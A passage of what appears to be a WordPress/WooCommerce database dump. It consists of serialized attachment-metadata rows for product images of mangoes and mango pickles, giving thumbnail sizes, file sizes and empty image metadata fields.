image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4518,1067,'_wp_attached_file','2022/03/mangoes-1.jpg'),(4519,1067,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:727;s:6:\"height\";i:477;s:4:\"file\";s:21:\"2022/03/mangoes-1.jpg\";s:8:\"filesize\";i:181623;s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:21:\"mangoes-1-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:67078;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:21:\"mangoes-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:37382;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:19:\"mangoes-1-50x33.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:33;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:34017;}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"mangoes-1-300x197.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:197;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"mangoes-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:21:\"mangoes-1-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:21:\"mangoes-1-600x394.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:394;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"mangoes-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:19:\"mangoes-1-48x31.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:31;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:19:\"mangoes-1-48x31.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:31;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1646318825\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(4520,1068,'_wp_attached_file','2022/03/aapemdi-pickle-mngo.jpg'),(4521,1068,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:450;s:4:\"file\";s:31:\"2022/03/aapemdi-pickle-mngo.jpg\";s:8:\"filesize\";i:57675;s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:31:\"aapemdi-pickle-mngo-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23129;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:31:\"aapemdi-pickle-mngo-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3859;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:29:\"aapemdi-pickle-mngo-50x38.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:38;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1279;}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"aapemdi-pickle-mngo-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"aapemdi-pickle-mngo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:31:\"aapemdi-pickle-mngo-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"aapemdi-pickle-mngo-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:29:\"aapemdi-pickle-mngo-48x36.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:36;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:29:\"aapemdi-pickle-mngo-48x36.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:36;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_thumbnail_preview\";a:4:{s:4:\"file\";s:31:\"aapemdi-pickle-mngo-320x384.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:384;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4546,1070,'_wp_attached_file','2022/03/aapemdi-pickle-mngo-1.jpg'),(4547,1070,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:450;s:4:\"file\";s:33:\"2022/03/aapemdi-pickle-mngo-1.jpg\";s:8:\"filesize\";i:57675;s:5:\"sizes\";a:9:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:33:\"aapemdi-pickle-mngo-1-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23129;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:33:\"aapemdi-pickle-mngo-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3859;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:31:\"aapemdi-pickle-mngo-1-50x38.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:38;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1279;}s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"aapemdi-pickle-mngo-1-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"aapemdi-pickle-mngo-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:33:\"aapemdi-pickle-mngo-1-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:33:\"aapemdi-pickle-mngo-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:31:\"aapemdi-pickle-mngo-1-48x36.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:36;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:31:\"aapemdi-pickle-mngo-1-48x36.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:36;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4548,1071,'_wp_attached_file','2022/03/avakaya-pckle-mngo.jpg'),(4549,1071,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:219;s:6:\"height\";i:230;s:4:\"file\";s:30:\"2022/03/avakaya-pckle-mngo.jpg\";s:8:\"filesize\";i:5955;s:5:\"sizes\";a:7:{s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:30:\"avakaya-pckle-mngo-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3025;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:28:\"avakaya-pckle-mngo-50x53.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:53;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1347;}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"avakaya-pckle-mngo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"avakaya-pckle-mngo-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:28:\"avakaya-pckle-mngo-48x50.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:50;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:28:\"avakaya-pckle-mngo-48x50.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:50;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_thumbnail_preview\";a:4:{s:4:\"file\";s:29:\"avakaya-pckle-mngo-219x64.jpg\";s:5:\"width\";i:219;s:6:\"height\";i:64;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4550,1072,'_wp_attached_file','2022/03/avakaya-pckle1.jpeg'),(4551,1072,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:800;s:6:\"height\";i:448;s:4:\"file\";s:27:\"2022/03/avakaya-pckle1.jpeg\";s:8:\"filesize\";i:25570;s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:27:\"avakaya-pckle1-320x320.jpeg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12266;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:27:\"avakaya-pckle1-100x100.jpeg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2548;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:25:\"avakaya-pckle1-50x28.jpeg\";s:5:\"width\";i:50;s:6:\"height\";i:28;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:869;}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"avakaya-pckle1-300x168.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:168;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"avakaya-pckle1-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"avakaya-pckle1-768x430.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:430;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:27:\"avakaya-pckle1-320x320.jpeg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:27:\"avakaya-pckle1-600x336.jpeg\";s:5:\"width\";i:600;s:6:\"height\";i:336;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:27:\"avakaya-pckle1-100x100.jpeg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:25:\"avakaya-pckle1-48x27.jpeg\";s:5:\"width\";i:48;s:6:\"height\";i:27;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:25:\"avakaya-pckle1-48x27.jpeg\";s:5:\"width\";i:48;s:6:\"height\";i:27;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4552,1073,'_wp_attached_file','2022/03/dasheri.jpg'),(4553,1073,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:19:\"2022/03/dasheri.jpg\";s:8:\"filesize\";i:25786;s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:19:\"dasheri-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12665;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:19:\"dasheri-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2215;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:17:\"dasheri-50x50.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1034;}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"dasheri-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"dasheri-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:19:\"dasheri-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:19:\"dasheri-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:17:\"dasheri-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:17:\"dasheri-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_thumbnail_preview\";a:4:{s:4:\"file\";s:18:\"dasheri-320x64.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:64;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4554,1074,'_wp_attached_file','2022/03/devgad-alphonso.jpg'),(4555,1074,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:27:\"2022/03/devgad-alphonso.jpg\";s:8:\"filesize\";i:38858;s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:27:\"devgad-alphonso-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15002;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:27:\"devgad-alphonso-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2634;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:25:\"devgad-alphonso-50x50.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1204;}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"devgad-alphonso-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"devgad-alphonso-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:27:\"devgad-alphonso-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:27:\"devgad-alphonso-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:25:\"devgad-alphonso-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:25:\"devgad-alphonso-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_thumbnail_preview\";a:4:{s:4:\"file\";s:26:\"devgad-alphonso-320x64.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:64;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4556,1075,'_wp_attached_file','2022/03/devgad-alphonso1.jpeg'),(4557,1075,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:450;s:6:\"height\";i:450;s:4:\"file\";s:29:\"2022/03/devgad-alphonso1.jpeg\";s:8:\"filesize\";i:40414;s:5:\"sizes\";a:9:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:29:\"devgad-alphonso1-320x320.jpeg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15369;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:29:\"devgad-alphonso1-100x100.jpeg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2878;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:27:\"devgad-alphonso1-50x50.jpeg\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1212;}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"devgad-alphonso1-300x300.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"devgad-alphonso1-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:29:\"devgad-alphonso1-320x320.jpeg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:29:\"devgad-alphonso1-100x100.jpeg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:27:\"devgad-alphonso1-48x48.jpeg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:27:\"devgad-alphonso1-48x48.jpeg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4558,1076,'_wp_attached_file','2022/03/kesar.jpg'),(4559,1076,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:800;s:6:\"height\";i:800;s:4:\"file\";s:17:\"2022/03/kesar.jpg\";s:8:\"filesize\";i:35540;s:5:\"sizes\";a:12:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:17:\"kesar-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10519;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:17:\"kesar-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2195;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:15:\"kesar-50x50.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1076;}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"kesar-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"kesar-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"kesar-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:17:\"kesar-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:17:\"kesar-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:17:\"kesar-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:15:\"kesar-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:15:\"kesar-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_thumbnail_preview\";a:4:{s:4:\"file\";s:17:\"kesar-320x256.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:256;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4560,1077,'_wp_attached_file','2022/03/magaya-pckle-e1646370369505.png'),(4561,1077,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:540;s:6:\"height\";i:639;s:4:\"file\";s:39:\"2022/03/magaya-pckle-e1646370369505.png\";s:8:\"filesize\";i:659895;s:5:\"sizes\";a:12:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:39:\"magaya-pckle-e1646370369505-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:186891;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:39:\"magaya-pckle-e1646370369505-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:19914;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:37:\"magaya-pckle-e1646370369505-50x59.png\";s:5:\"width\";i:50;s:6:\"height\";i:59;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:6459;}s:6:\"medium\";a:4:{s:4:\"file\";s:39:\"magaya-pckle-e1646370369505-254x300.png\";s:5:\"width\";i:254;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"magaya-pckle-1024x1024.png\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"magaya-pckle-e1646370369505-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"magaya-pckle-768x768.png\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:39:\"magaya-pckle-